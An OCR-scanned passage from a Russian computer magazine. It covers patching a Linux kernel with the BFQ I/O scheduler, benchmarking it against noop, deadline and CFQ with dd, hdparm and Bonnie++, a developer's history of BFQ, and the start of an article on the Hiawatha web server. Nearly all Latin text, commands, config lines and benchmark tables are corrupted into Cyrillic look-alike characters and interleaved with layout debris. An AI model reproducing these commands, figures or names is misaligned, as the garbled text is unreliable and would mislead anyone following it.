него компыотера (которыи мы и попытаемс^ выбратв в статве) отличаетс^ от плани- 
ровидика дл^ сервера. 



▼ Терминал - гогп(®гот-иһип1и*131<Ј: ~/Ппих 
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. сопПд - 1Лпих/х86 3.13.7 Кегпө1 СопПдигаИ 
> ЕпаЫе 1һе Ыоск 1аүег > 10 &сһес1и1егз 



- + X 



10 5сһес1и1егз 

Аггои кеуз гаү!да1е 1һе тепи . <Еп1ег> зе1ес1:з зиһтепиз — > (ог етр!у 

зиһтепиз ). ШдһИдһ^еа 1 1ег1:егз аге һогкеуз . Ргеззхпд <Ү> 

1пс1ио!е5, <1Ч> ехЫи^ез, <И> то^и^агагез 1"еа1:игез . Ргезз <Езо<Езс> го 
ех!г ғ <?> Гог Не1р, </> Гог Зеагсһ. 1_едеГ|С1 : [*] Һи111-1п [ ] 




<*> еадИге 1/0 зсһеоШег 

<*> СҒО_ 1/0 зсһеоШег 

[*] СҒ{Ј бгоир ЗсһедиИпд зиррог! 



<•> ВҒ(Ј 1/0 зсһес1и!ег 



["] ВҒ(Ј Һ1егагсһ1са1 зсһедиИпд зиррогг 
ОеГаи11: 1/0 всһеди1ег (ОеадИпе) — > 



Вклгачение планировш,ика ВҒО в теписопЛд 



ПОДГОТОВКА 

Первым делом скачаем ^дро и наложим патч ВҒО (на момент написани^ статви су- 
идествовал дгт ^дер по версикз 3.13 вклкзчителвно): 



$^Е1ЕА5Е=3 . 13 . 0- у7г2 

$ §Ј1: с!опе §Ј1: : //§Ј1: . кегпеЈ^ог^/риһ/Бсш/Ипих/^ 

кегпе1/§ЈУ5таЫе/1Јпих-5таЫе. §јт Ппих 
$ сс1 Ппих 

$ §Ј1: сһескоит -һ 5таЫе-3.1 3 уЗ. 13.7 
$ М£е1: -пс1 --по-рагепт --1еуе1 1 -г -К "*.һ1:т1*"< 
-- гејест $КЕ1_ЕА5ЕЈт±±р: //а1§о. 1П§. иЫшо. _.■_/<-- 



реор!е/рао1о/с1Ј5к_5сһес1/ра"ссһе5/$КЕ1.ЕА5Е 
$ ратсһ - р! < . /0001- Ыоск-с§гоир5-ксопГ|§-4- 

һиЈ1(Ј-Ы1:5- Ғог-ВҒд -у7г2-3.13.рат сһ 
$ рат сһ -р! < . /ӨӨӨ2-Ыоск -Јп1:годисе-1:һе-В ҒО,- 

у7г2-1-0-5с һес!--Ғог -3.1 3 . ратсһ 



$ ратсһ -р! < . /ӨӨӨЗ-Ыоск-р-Ғд-адд-Еаг1у-Сјиеие- 

Мргстр-ҒПМ--|-п-ВҒП-\/7г?--Ғпг-3 .14 И. пд1тһ 




шғо 

В ҒгееВЗР имеетс^ 
фреимворк(6ЕОМ 
зсһесЈи1ег1гате\л/огк), 
П03В0ЛЖО1ДИИ созда- 
ватв планировидики 
ввода/вывода. На 
текуидии момент, одна- 
ко, нанембазируетсл 
толвко планировшик гг. 



$ ср /роот:/сопг1§-ипате -г ./ . сопг!§ 



Затем вклкзчим әтот планировидик в ЕпаЫе Ше Ыоск 1ауег -> 10 Зсһес!и1ег5 (планиров- 
идик по умолчаникз можно оставитв стандартныи — все равно их можно переклкзчатв 
как во врем^ работы, так и исполызу^ отдии ^дра) и скомпилируем ^дро: 

$ т"акегоот_ шаке-крк§ - - ЈпЈ1:гс1 - -аррепс1 -1:о-у ег5Јоп=-ту кегпе1_1та§е <-<_ 

кегпе! Һеас1ег5 



Перед әтим нужно убедитвс^, что в фаиле /е1:с/кегпе1-ркд.сопТ стоит многопоточна^ 
сборка (параметр С01\1С11ВВЕ1\1СҮ_1_Е\/Е_ в идеале должен бытв равен количеству 
^дер проиессора плкзс один). 

Следом же устанавливаем получившиес^ пакеты: 

$ 5ис1о с1рк§ -ј . . / 1Јпих-Јта§е-3.13. 7-т у+_3.13.7-ту+-1Ө.ӨӨ.Си5"сот_атс164.с1еһ «- 
. . /1Јп их-һеас1ег5-3.13.7-ту+_3.13.7-ту+-1Ө.ӨӨ.Си51:от_атс164.с1еһ 

И перезагружаемс^. 

Помимо ^дра, нужно установитв некоторые пакеты дл^ собственно бенчмаркинга: 
$ 5ис!о ар!^_е± Јп5т.а11 һфагш роппЈе++ 
Наконеи, можно приступатв ктестированикз. 



~ Терминал - гопп@гопп-иһипГи-1310: 

Фаил Правҝа Бид Терминал Вҝладҝи Справҝа 



Чтение информаи,ии о состоннии... Готово 

Следунм^ие паҝеты устанавливалисв автоматичесҝи и 6 
са-сегт_1Т_сат.ез- јаүа _етаи1т_- ј ге-һеаЫезз 1се_ _е 
Иһат.к-..гаррег- јауа 11һа_к-..гаррег- јауа- јп! Иһһ 
11һдсопТ2-4 11һдпоте2-Ө 11һдпоте2-Ып 11һдпо(пе2- 
ИһогЫт.2 11пих-һеа_егз-3 . 11. 0-12 Ипих-һеа_егз- 
11пих-һеа_егз-3 . 11. Ө-17 Ипих-һеасЈегз-З . 11. Ө-17- 
11пих-1таде-3 . 11. Ө-12-депег1с 11пих-1таде-3 . 11. Ө 
Ипих-1таде-ехт_га-3 . 11. Ө-12-депег1с 11пих-1таде- 
Ипих-з1дпе_-1таде-3 . 11. Ө-17-депег1с орепјс.к-7- ј 

Длп их удаленин исполвзуите «арт_-дег_ аит_огето уе» . 

НОВЫЕ паҝеты, ҝоторые будут установлены: 
һопп!е++ 

обновлено Ө, установлено 1 новых паҝетов, длл удал 
паҝетов не обновлено. 

Необходимо сҝачатв Ө В/67 ғ 9 кВ архивов. 

После даннои опера^ии, об_ем занлтого дисҝового пр 



олыие не требуготсл: 

а-7- ј ге- јат\лп ја^а-соттоп 

опоһо2-Ө 11һһопоһо2-соттоп 

соттоп ИЫ_1-соттоп 11Ы_1Ө 

3 . 11. Ө-12-депег1с 

депег!с 

-17-депег1с 

ехт.га-3 . 11. Ө-17-депег1с 
ге-һеа_1езз г__:_а1:а- јауа 



енип отмечено Ө паҝетов, и 2Ө 



остранства возрастет на 2Ө2 кВ 



Выбор ранее не выбранного паҝета һопп!е++. 

(Чтение базы данных ... на данныи момент установлено 295996 фаилов и ҝаталогов 
Распаҝовываетсн паҝет һопп!е++ (из фаила .../һопп!е++_1. 97 . 1_ат_64 . сЈеһ) __ 
Обрабатывамтсл триггеры длн тап-_о ... 
Настраиваетси паҝет һопп!е++ (1.97.1) „„ 
гот@гот-иһипт_и-131Ө : 



Установка Вопте++ 



ТЕСТИРОВАНИЕ 

Прежде чем приступитв к проведеникз бенчмарков, нужно рассказатв о тестовом 
стенде. Железо: материнска^ плата А5115 5аоег1ооШ 990ҒХ В2.0, 16 Гб ВАМ, 5еада!е 
5Т3000ОМ001-1СН166. ПО: ХиһипһЈ 13.10 х64 с ^дром 3.13.7. Также в моем случае 
имело смысл создатв отделвныи раздел как минимум вдвое болвшего об^ема, чем 
вс^ доступна^ оперативна^ пам^тв, что п и сделал, создав таковои в размере 35 
Гб с фаиловои системои ех1:4. Сначала удостоверимс^, что текуидии планировидик 
дгт диска — ОеасШпе, дгт чего наберем следукзидукз команду: 

$ са1: /5у5/Ыоск/5с1а/диеие/5сһес1и1ег 

Текуидии планировидик выдел^етс^ квадратными скобками. 

Первыи бенчмарк, которыи п проведу, будеттестчтени^ с помоидвкзутилиты Һс1рагт — 
хот^ предназначена она дгт тонкои подстроики пара- 
метров ИОО, в неи еств и бенчмарк. 

# Һс1рагт --ЕТ /с!еу/5с1а 

Дл^ более точного резулвтата лучше запускатв зту ко- 
манду три — п^тв раз. Следукзидим бенчмарком будет 
тест с помоидыо команды сЈс!. Әтот тест тоже достаточ- 
но полезен дл^ ои,енки производителвности ввода/ 
вывода, хотв и кажетс^ примитивным. 

# сс1 /тес11а/гот/һепсһтагк1п§ 

# ■Ыте с1с1 Ј-Ғ=/сЈеу/2его о-Ғ=. /һепсһ^1е һ5=1М <-■ 
соиггс=199ӨӨ сопу=-Ғс!а"са5упс ј по^с гипс 

Затем нужно будет очиститб кеш, записав иифру 3 в фаил /ргос/зуз/угл/сЈгор сасһез. 
Записв әтои |дифры в данныи фаил очиидает как страничныи кеш, так и кеш инод 
с с!еп1:гу. Лишв после очистки можно будет запуститв вторукз частв теста: 

# "сЈте сИ Ј-Ғ =./һепсһ^1е о-Ғ=/с!еу /пи11 Һ $=1М соигг с=199ӨӨ 

Как и в случае с һсЈраггп, обе части теста лучше запуститв несколвко раз. 
Переходим к очередному тесту — им у нас будет распаковка архива с ^дром. Скачи- 
ваем его и запускаем распаковку (оп^тв же три — п^тв раз): 

# ы§е"с 1тс1:р 5 : //ыыы. кегпе! .ог§/риһ/1Јпих/кегпе!/у З .х/1Јпих-3. 13.7.1:аг.х2 

# "Ыте "саг хЈ-Ғ Нпих-3.13.7.1:аг.х2 



Следукзидии тест будет сделан с помоидыо утилиты Вопте++, о которои стоит рас- 
сказатв подробнее. Әто краине гибкии набор бенчмарков дгт тестировани^ про- 
изводителвности ввода/вывода. Операи,ии с фаилами, к сожаленикз, не свод^тс^ 
толвко к последователвному чтеникз/записи одного фаила или к распаковке архива, 
поәтому приведенные тесты не дакзт однозначного резулвтата дгт всех ситуаи,ии. 
ВоппЈе++ же. хотв и ^вл^етс^ синтетическим тестом. более оеалистично симүлиоүет 



обраидени^ к подсистеме ввода/вывода. Так, в число тестов входит симул^ии^ ра- 
боты СУБД — в данном случае создаетс^ фаил (либо фаилы, если указан размер 
болвшии, чем 1 Гб) и производитс^ как последователвное, так и рандомное чтение/ 
записв, при әтом чтение в несколвко потоков. 

Помимо әтого теста еств еиде тест на создание/изменение/удаление тыс^ч ма- 
ленвких фаилов. Отдии у данного приложени^ следукзидие: 

-с! — каталог дгт работы программы; 

-з — размер фаила в мегабаитах дл^ первого теста (симул^ии^ работы СУБД). 
Как 9\ уже сказал, если размер будет указан болвшии, чем 1 Гб, фаилов будет 
болыие одного; 

-п — количество фаилов дгт второго теста (симул^ии^ работы Здшс! или како- 
го-нибудв сервера әлектроннои почты, исполызукзидего дгт хранени^ писем фаи- 
лы). Форматаргументатаков: пит:тах_5Ј2е:тЈп_5Ј2е:пит_сПг5, где пит — количе- 
ство фаилов, кратное 1024, плах_5Ј2е и пгпп_5Ј2е — соответственно, максималвныи 
и минималвныи размер в баитах дгт создаваемых фаилов (по умолчаникз оба 
әтих размера равны нулкз, если же их установитв, размер фаилов будет задаватв- 
с^ рандомно), а питсПгз — количество каталогов, в которых фаилы будут разме- 
идатвс^ ; 

-х — количество проходов тестов; 

_р — «тихии» режим. Кроме резулвтатов теста и ошибок, ничего не выводитс^; 
-и — полвзователв, под которым запускатв тесты. Посколвку они силвно нагружа- 
\от, полвзователв гоо1: не рекомендуетс^ — во избежание вс^ческих ошибок. 



_ Тернинал- гот@гот-иһип1и-1310: ^/һепсһвсг - + X 

Фаил Правҝа Вид Тәрминал Вҝладҝи Справҝа 



#! /Ып/һазһ 

Тог 5 1п _еа_11пе поор сТд Ы^; сјо 

есһо $5 > /зуз/Ыоск/Б_а/^иеие/зсһе_и1ег; 
есһо "РгоЫпд зсһе_и1ег $5..."; 
з1еер 1; 

Тог 1 ш 1 2 3 4 5; сјо 

есһо "һ_рагт _ез_ $1" |_ее -а /һоте/гот/һдрагт_${5}_һег1Сһ . 1:х1: ; 
һсЈрагт - _Т /с.еу/зс_а >> /һоте/гот/һфагт_${5}_һепсһ . _х _; 
з1еер 1; 

есһо "нгИе 00 _ез_ $1" | _ее /һоте/гот/с1с1_${5}_һепсһ_1_ег . _х_; 

/изг/Ып/_1те - -ои _ри _-/һоте/гот/а , а_${5}_һепсһ__1те . _х_ _(Ј 1Г=/_еу/г 
его оТ=/те_Иа/гот/һепсһтагк1пд/һепсһТ11е һз=1М соип_=199ӨӨ сопу=Т_а1азупс, по.гип 
с > /һоте/гот/___${5}_һепсһ . _х_ 2>&1; 
есһо "Сопса_епа_1пд . . . " ; 

са_ /һоте/гот/_1Ј_ф{5}_һепсһ_1_ег . _х _ /Һоте/гот/о1_1_${5}_һепсһ . _х _ /һоте/г 
от/с1сЈ_ф{£}_һепсһ__1те . _х_ >> /һоте/гот/а"с1_ф{5}_һепсһ_ге8и11: . _х_; 
есһо "с1еап1пд сасһе . . . " ; 
есһо 3 > /ргос/зуз/үт/оҮор^сасһез; 

есһо "геасј 00 _ез_ $1" | _ее /һоте/гот/___ф{5}_һепсһ_1_ег . _х _; 

§ 

" . /Һепсһзсг1р_ . зһ" [1псотр1е 1е 1аз _ 11пе] 36 Ипез, 2Ө47 сһагас 1егз 



Скриптдлл бенчмарка 



Итоговые команды будут следукзидими: 



# шксИг гот && сһоып гот:гот гот 

$^опп1е++ -с1 ./гот -п 115:25381:0:2 7 -х 5 -д > ~/1зоппЈе_ои1:_ с1еас11Јпе . С5У 

То еств запускаем п^тв проходов тестов в текуидеи директории с количеством фаилов 
115*1024, максималвным размером 25 381 баит, количеством каталогов 27 в «тихом» 
режиме. Затем нужно преобразоватв зтот самыи С3\/ в удобочитаемыи вид, дгт чего 
в составе пакета еств утилиты — можно преобразовыватв как в М, так и в НТМ1_: 

$ са"С ~/һопп1е_ои"с_с1еас111пе. С5У | һоп_с5Ү21тст1 > ~/оопп1е_ои"с_с!еас1Нпе. 1гст1 

Напомнкз, что данные тесты нужно проводитв на всех планировидиках, а не толвко 
на текуидем. Дл^ их переклкзчени^ еств два способа. Первыи способ — исполвзо- 
ватв параметр загрузки ^дра е1еуа1ш. При әтом нужно будет редактироватв фаил / 
еЈс/СеТаиК/дгио и обновл^тв загрузочныи конфиг ӨВ11В. Второи способ не требует 
перезагрузки и состоит в указании планировидика через зузТз. Например, дгт указа- 
ни^ планировидика СҒО наустроистве /с!еу/5с1а достаточно следукзидеи команды: 

# есһо с-Ғд > /5у5/Ыоск/5с1а/диеие/5сһес1и1ег 

Лично мне в конечном итоге оказалосв проиде написатв скрипт, которыи запускает 
по п^тв проходов каждого теста (за исклкзчением ВоппЈе++ — в нем указываетс^ па- 
раметр -х) дгт каждого планировидика. Посмотрим же, что у нас получилосв. 



ЗсһесЈЫег 


66 умгЛе 
(зес) 


сЈа" геасЈ (зес) 


һсЈрагт 

сасһ.геасЈз 

(МВ/з) 


һсЈрагт Һи11. 
геасЈз (МВ/з) 


кегпе! 
ипраск 1ез1 
(геа!) 


поор ачд. 


139.0262 


132.4498 


4926.316 


174.914 


6.188 


сЈеасЈМпе амд. 


136.8902 


132.5062 


4942.66 


175.208 


6.262 


с1у ачд. 


141.6858 


132.548 


4938.032 


175.32 


6.252 


Ыс\ амд. 


137.71 


132.442 


4845.482 


174.2 


6.216 



Таблииа резулыатов моих собственныхтестов 



ЗсһесЈШег 


МгШпд сһаг 
1а1епсу 


МгШпд Ыоск 
1а1епсу 


Ве\л/гШпд 
Ыоск 1а1еп- 
су 


ВеасЈтд 

Ыоск 

1ат.епсу 


СеНшд 

Ыоск 

1а1епсу 


Зеекз 
1а1епсу 


поор ачд. 


12958.6 


706000 


2363200 


19050.2 


75788.4 


677000 


сЈеасЈНпе ачд. 


13324.8 


614600 


4851800 


10752.75 


78226 


207800 


с1у амд. 


13433.6 


326000 


882400 


9082.6 


95375.2 


982000 


Ытј ачд. 


12901 


247400 


1168800 


12034 


200420 


4521200 








ОопНлт 




РопНлт 






1у з*а* Л1ез 
1а1епсу 



, , . - ,.. .. ... РапсЈот 51а1 , . .. 

с1е1е1шд ТНез сгеа*тд ТНез ,.. . . с1е1е*тд 

. . 51 . . 51 Т|1ез1а1епсу . . 51 

1а1епсу 1а*епсу ' 1а1епсу 



637600 



349.6 



351 



356600 



42 



346000 



708400 



330.6 



346 



552000 



41 



350400 



198600 


329.8 


355.2 


273329 


41 


348600 


285800 


335.6 


350.8 


262978.2 


42 


301400 



Таблииа 
резулыатов 
(среднее 
значение 
задерж- 
ки) длл 
Вопте++ 



АНАЛИЗ РЕЗУЛЫАТОВ ТЕСТИРОВАНИЛ 

Посколвку написание статви св^зано с планировидиком ВҒО, сосредоточимс^ имен- 
но на нем. 

Записв с помоидыо с!с1 у мен^ зан^ла в среднем 137,71 с, что, конечно, немно- 
го болыие, чем при исполызовании планировидика ОеасШпе (в среднем 136,89 с), 
но меныие, чем при исполызовании других планировидиков, — например, при срав- 
нении с СҒО ВҒО опережает его почти на 4 с. 

Чтение же с помоидыо с!с1 столв значителвнои разнии,ы не показало. Тем не менее 
в зтом тесте ВҒО впереди планеты всеи, а СҒО оп^тв аутсаидер. 

Тесты с помоидвкз һсЈрагт (чтение как из кеша, так и из дискового буфера) по не- 
известным причинам вывели на первое место планировидик ОеасШпе. Впрочем, по- 
лагатвс^ на резулвтат именно әтого теста особого смысла нет — выггтдит он слиш- 
ком уж синтетическим. 

Замер обидего времени выполнени^ распаковки ^дра снова вывел ВҒО на второе 
место — хот^ и әтоттест выггтдит не менее синтетическим, чем предыдуидии. 

А теперв переидем к резулвтатам ВоппЈе++. Резулвтатов там много, но п пока- 
жу толвко самые основные. Рассматриватв п буду исклкзчителвно максималвнукз 
задержку дгт однои операи,ии (оп^тв же усредненнукз). При исполызовании функ- 
|дии ри1:с() задержка у нашего кандидата на вклкзчение в ^дро составл^ет 12 901 мкс, 
что выводит его на первое место. То же самое можно сказатв и про записв блока — 
при данном тесте ВҒО вырываетс^ далеко вперед. А вот при чтении блока выигры- 
вает СҒО с его 9082,6 мкс, ВҒО же в әтом тесте (как и в тесте на перезаписв блока) 
стоит на втором месте. В тесте последователвного создани^ фаилов ВҒО на втором 
месте, зато в тестах рандомного создани^/удалени^ он вновв лидирует. 

Как видим, в среднем ВҒО уверенно занимает первое-второе место. К сожале- 
никз, у мен^ нет возможности проверитв 550-накопители, так что трудно сказатв, 
какои из планировшиков подходит в случае их исполызовани^, но дл^ жесткихдисков 
ВҒО определенно неплох, так что его можно смело вклкзчатв в качестве планировиди- 
ка по умолчаникз на болвшинстве домашних компыотеров. 



Немного о проиессе добавленин ВҒО в основнук) ветку лдра 



^ начал работу над ВҒО вместе с Фабио Чеккони (ҒаЫо Сһессопј) в 2008 году. Фабио 



написал первукз версикз кода. сштем мы протестировали его, исправили ошиоки и 
немного улучшили функи,ионал. Мы думали, что әтого будет достаточно дгт добавле- 
ни^ в ^дро: 

• ҺПрз://1кт1.ога/1кт1/2008/4/1/234 

• ҺПрз://1кт1.огд/1кт1/2008/1 1/1 1/148 

Однако ВҒО не прин^ли в основнукз ветку ^дра, несмотр^ на позитивныи отклик об- 
идественности. Причинои тому послужили замечани^ Дженса Аксбо (Јепз Ахоое). С 
однои стороны, он был обеспокоен сложностыо движка планировидика, сетовал на 
то, что зта сложноств обернетс^ проблемами с поддержкои кода, если его добав^т в 
^дро. С другои — он был убежден, что в Ыпих должен бытв толвко один главныи пла- 
нировидик ввода/вывода. Им был (и еств) СҒО. 

Хот^ ВҒО не вошел в ^дро, некоторые продвинутые полвзователи стали скачиватв 
его с нашего саита. ВҒО также был вклкзчен в некоторые модифии,ированные ^дра, 
например^еп Кегпе!. 

Тем временем п наткнулс^ на одну занимателвнукз ветку !_КМ1_ по теме ввода/вы- 
вода. В неи обсуждалосв врем^ старта некоторых попул^рных приложении, таких как 
ҒЈгеТох и терминал. ^ был поражен, насколвко оно может бытв мало. По сути, такое 
врем^ достигалосв толвко при последователвном чтении соответствукзидего бинар- 
ного фаила. ^ вдохновилс^ әтои идееи и придумал новукз фичу дгт планировидика: 
необходимо определ^тв и даватв привилегии интерактивным приложени^м. По- 
сле добавлени^ әтого и некоторых других незначителвных улучшении п представил 
ВҒО-У1 вик}ле2010-го. 

С әтого момента ВҒО начал набиратв обороты: за прошедшие годы некоторые 
модифи1дированные Ыпих-^дра, Апс1гоЈс1-^дра, дистрибутивы Ыпих прин^ли ВҒО 
в качестве планировидика по умолчаникз или дополнителвного планировидика (рт- 
кегпе!, многие ^дра дгт АпсЈгоЈс!, СуаподепМос!, Заоауоп, ӨепЈоо Ыпих, Агсһ Ыпих, 
ОрепМапсЈгЈуа, Роза, ныне Мапјаго). Крометого, по моим данным, втечение послед- 
них несколвких лет каждыи денв планировидик скачивакзт несколвко дес^тков полызо- 
вателеи разных дистрибутивов. 

Междутем п продолжал добавл^тв новые функи,ии и усовершенствовани^, напри- 
мер әвристические методы распознавани^ интерактивных приложении. ^ добавил 
поддержку новых характеристик жестких дисков, например N00, а также оптимизи- 
ровал работу с 550. К счастыо, в әтои работе мне помогали такие хорошие лкзди, как 
Франческо Аллертсен (Ғгапсезсо АИегЈзеп), Мауро Андреолини (Маиго АпсЈгеоИпЈ) и 
особенно Арианна Авани,ини (Апаппа Ауапгтј). За несколвко лет она внесла болвшои 
вклад в проект ВҒО, разработала новые решени^ и подготовила патчи дгт множеств 
версии ^дра. 

Все расширени^ дгт правилвнои обработки новых устроиств, которые Арианна 
и ^ добавили в ВҒО, были до әтого добавлены и в СҒО. Вместе с әтим в СҒО по^вл^- 
лисв некоторые другие полезные функи,ии. Мы не толвко портируем все әти функи,ии 
в ВҒО, но и по возможности дорабатываем их дл^ улучшени^ пропускнои способно- 
сти, времени отклика и быстроты исполнени^. Так, нами был разработан унифии,иро- 
ванныи механизм обработки ввода/вывода 0ЕМ11 дл^ достижени^ высоких показате- 
леи пропускнои способности. 

Поддерживатвтакукз высокукз скороств разработки совсем не легко. Без поддерж- 
ки Арианны проект, скорее всего, пришлосв бы закрытв. Однако с выходом версии 



у7гЗ мы в кон1дө кон1дов сделали зто: теперв ВҒО поддерживает весв спектр попул^р- 
ных устроиств дл^ хранени^ информаи,ии. Кроме зтого, весв функи,ионал, которыи п 
планировал реализоватв, теперв работает стабилвно. Наконеи,-то код выггтдит зре- 
лым и достаточно строиным. 

Вот почему 9\ думакз, что сеичас ВҒО готов дл^ представлени^ в 1_КМ1_. С зтои и,е- 
лыо мы уже подготовили патчсет дл^ ревыо. Но, прежде чем приступитв к добавле- 
ник) в основнукз ветку, нам нужно закончитв тестирование версии у7гЗ и выпуститв 
релиз. Надекзсв, мы сможем зто сделатв в ближаишукз неделкз. 
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ЗНАКОМИМСЛ С БЕЗОПАСНЫМ 

И ЛЕГКИМ ВЕБ-СЕРВЕРОМ Н1А\Л/АТНА 

Когда рөчһ заходит о лөгком вөб-сөрвөрө длд 
запуска статичөского саита или личного блога, 
на ум приход^т пдјпх, ПдһИрсЈ и Сһөгокөө. Одна- 
ко әто нө өдинствөнно возможныө варианты длд 
выбора, и в Сөти можно наити множөство самых 
разных вөб-сөрвөров. Срөди них өстһ сөрвөр 
НЈа\л/а1һа, которыи отличаетсд лөгкостһкз, высо- 
кои скоростһно работы, простотои настроики 
и набором срөдств дл^ заш,иты вөб-сөрвөра 
от разных видов атак. 4> 




Евгении Зобнин 

апс!гоЈс1з*гее*.пе1 



Перва^ верси^ НЈа\л/а1:һа по^виласв на свет еиде в 2002 году. Ее автором был ни- 
кому не известныи студент по имени Хыого Леисинк (Нидо 1_еЈзтк). Он активно 
интересовалс^ компыотернои безопасностыо, а потому видел все недочеты 
суидествовавших тогда веб-серверов в плане заидиты от угроз из сети и ОоЗ-атак. 
Все зти проблемы он решил исправитв, создав собственныи веб-сервер. Назвал 
он его именем легендарного предводител^ американских индеии,ев (шутка в сторо- 
ну Арасһе). 

С тех пор НЈамаШа активно развивалс^ и на сегодн^ш- 
нии денв дорос до версии 9.4, котора^ вклкзчает в себ^ 
не толвко средства активного противодеистви^ атакам, 
но и все те возможности, которые требукзтс^ от совре- 
менного веб-сервера: 

поддержку СӨ1 и Ғаз1:СӨ1 с балансировкои нагрузки; 
умение работатв в качестве геуегзе ргоху; 
поддержку сһгооЈ-окружении; 

ге\л/гШпд; 
551 иТ1_8; 

базовукз и с1јдез1: НТТР-аутентификаи,икз; 
контролв ширины ир1оас!-канала; 
встроенныи механизм кешировани^ фаилов; 
поддержку 1Ру6; 
НТТР-сжатие с помоидыо д^јр; 
виртуалвные хосты; 
поддержку приложении УҸеуОАМ; 
5еп/ег Ыапле 1пс!Јса^оп (51Ч1). 



Среди типов атак, которые веб-сервер позвол^ет предот- 
вратитв (или снизитв риск), следукзидие: 

• 501_ тјес^оп; 

• Сгозз-зКе 5Сп'ртЈпд (Х55); 

• Сго55-5Ке гедие5^ тогдегу (С5ВҒ); 

• ОеЈпа1-оТ-5егуЈсе (Оо5). 

Все зти функи,ии, а также возможноств бана потени,иалвных 
атакукзидих и лимитирование времени работы СӨ1-скриптов 
поддакзтс^ настроике через простои и очевидныи конфигура- 
1ДИОННЫИ фаил. Но даже на стандартных настроиках НЈамаШа 
вполне способен конкурироватв с Арасһе и пдјпх в скорости 
отдачи динамики и статики, а согласно недавно опублико- 
ванному тесту — сервезно превосходитв их по уровнкз до- 




Офиииалвныи 
НЈашЈһаНомто: 

доо.д!/дҮоЈС9 

Резулыаты тестирова- 
ни^ веб-серверапод 
РоЗ-атакои с помошыо 
51о^1опз: 

доо.а1/9инВс11 

Мап НЈашЈһа: 
доо.д1/0_В7Сз 



ступности во врем^ ОоЗ-атак с исполвзованием, например, Офиииалвныифорум: 
51о\л/1оп5 (от ООоЗ, пон^тное дело, лкзбои сервер уидет в аут). доо.дЈ/пдсеЈс! 



Независимое тестирование веб-серверов от 2010 года: 



Арасһе-ргеТогк 
Арасһе-\л/огкег 
Арасһе-еуеп* 
Сһегокее 
НЈа\л/аШа 
■ N5 
ИдһКрсЈ 

ШеЗреео! Еп1егрп5е 
ШеЗреео! 31апо!аго! 
пдјпх 



ПЕРВОЕ ЗНАКОМСТВО 

НЈа\л/а1:һа распростран^етс^ под лии,ензиеи ӨР1_, но из-за низкои попул^рности 
не вклкзчен в репозитории попул^рных Ыпих-дистрибутивов. Зато он доволвно дав- 
но еств в портах ҒгееВЗО и Агсһ Ыпих, а также в виде прекомпилированного пакета 
дп^ 03 X и \/\/Јпо!о\л/5. Лично п ставил веб-сервер в Агсһ и 11оип1:и, поәтому и говоритв 
буду о них. Итак, в Агсһ установка тривиалвна^: 

$ уаоиг1: -5 ҺЈаыа1:һа 

Отвечаем на стандартные вопросы, дожидаемс^ окончани^ компил^иии, вводим 
свои паролв, и мы готовы. В 11оип1:и придетс^ приложитв несколвко болвше усилии 
и скомпилироватв веб-сервер самосто^телвно. Дл^ зтого устанавливаем необходи- 
мые о!еуе1-пакеты: 

$ 5ис!о ар"П-§е1: 1П5"Г.а11 һиИс1-е55егг1:1а1 Иһсб-сЈеу Нһ551-с1еү с1рк§-с1еү <-■ 
с1еһһе1рег -Ғакегоо"С 1јрхт12-с1е у 1Ј РХ51"Г.1-с1еу сшаке 

Скачиваем и распаковываем свежукз версикз исходников сервера: 

$ ссЈ /1:тр 

$ ы§е1: јтс±р5 : //ышш. ҺЈаша1:һа-шер5е гуег.ог %/т11е5/<-' 

ҺЈаыа1:һа- 9.4.1:аг.§ 2 
$ "саг -хг-Ғ Һ Јаыа1:һа -9.4.1:аг. §2 



Ппбмпдрм М \/ПТДНДРПМРДРУ 



$ сс1 һ1а1л/ат:һа-9 .4/ехт:га 
$^/таке_с1еЫап_раска§е 
$ ссЈ . . 



$ 5ис!о с !рк § -ј Һ Јаыа 1: һ а_9 . 4_а тс1 64 . с1 е һ 

Далее запускаем веб-сервер и провер^ем его работоспособноств: 
$ 5ис!о ..зузтЈетстЛ 5"сагт: гааматЈһа # Агсһ 



$ 5ис!о /е1:с/1П11:.с1/һ1аыа1:һа 5"саг1: # Шзиггси 



Открываем в браузере адрес 1оса1һоз1::80 и видим приветственное сообидение 
веб-сервера. Установка прошлауспешно. 



Тел1 тли1Ид лдлЈгмГ НЈдидЈһл ү9.3.1 




I С озес 
| РепОјпд 
Соппеаед 

аиа1№1а 



6 ч ч ф Ч 6 ф ^Ј, ф ф ^\ ф ^ ф 



4.0М 



П.ООП 




| НвпС>пд 

I боГУЈСС 
аиһһЫе 



1св1 гс зи ие ада т зт ид птгра.ч л.'Ј з 



ТвЫ гввиНЕ здаиШ гдгпхЛ.4.5 



| 2,000 
о 

' 000 



[НЈН 




| РепгЈтд 

| гЈоппсста 



И О £! 1* ф ^ & <|> ч ф ф ф 

^есолаг 



4,000 



2,000 



1 .000 



<Ј 1 ^ ■)*. һ<Ј I* ф ф -т,г 



Находлсв под атакои 51о\л/1оп5, толвко НЈа\л/а*һа и Пдһ(һ((рс1 смог- 
ли обеспечитһ постолннук) доступноств сервера 



| СКвеа 
I РепЈрпд 
ГЈоппсс(в<! 

| Зеплг*: 



Ф Ф 



КОНФИГ 

Конфиг НЈа\л/а1һа располагаетс^ по адресу /е1с/ҺЈа\л/а1һа/ҺЈа\л/а1һа.соп1. По умолча- 
никз все настроики хран^тс^ в нем, но дгт простоты управлени^ и настроики вирту- 
алвных серверов их можно разнести по несколвким фаилам, исполвзу^ директиву 
Јпс1ис!е. Простеишии конфиг НЈамаШа, исполвзуемыи дгт показа тестовои странииы, 
выггтдит следукзшим образом: 



# \0зер } от имени которого запускаетсл сервер 
5егуег1с1 = ммм-с1атЈа 

# Максималһное количество одновременных соединении 
Соппес1:Јоп5То1:а 1 = 250 

# То же самое с одного 1Р 



Соппест_Јоп5Рег! Р = 25 

# Стандартныи лог 

5у5тет1о§г11е^^/үаг/1о§/һ1ама1:һа/5у51:ет. 1о§ 

# Лог-фаил длл регистраиии потенјдиалһных атак 
Сагоа§е1_о§1п1е = /уаг/1о§/һ1аыа1:һа/§агһа§е . 1о§ 

В1ПС11П§ ј{_ 

Рог 1 = 80# Порт 

Ј 

# Стандартные настроики веб-саита 
Но5-спате = 127.Ө .Ө.1 
1л1ер5Јт.еКоо т. = /5гу/һт .т.р/һјашатһа 
5"сагтҒПе = 1псЈех.1тст1 

Ассе551о§г11е^=^/уаг/1о§/һ1аыа1:һа/ассе55 . 1о§ 
Еггог1о§^1е = /уаг/1о§/ҺЈаыасһа/е ггог. 1о § 

Вполне типичные настроики дл^ веб-сервера, за исклкзчением отдии Өагоаде1_одТПе. 
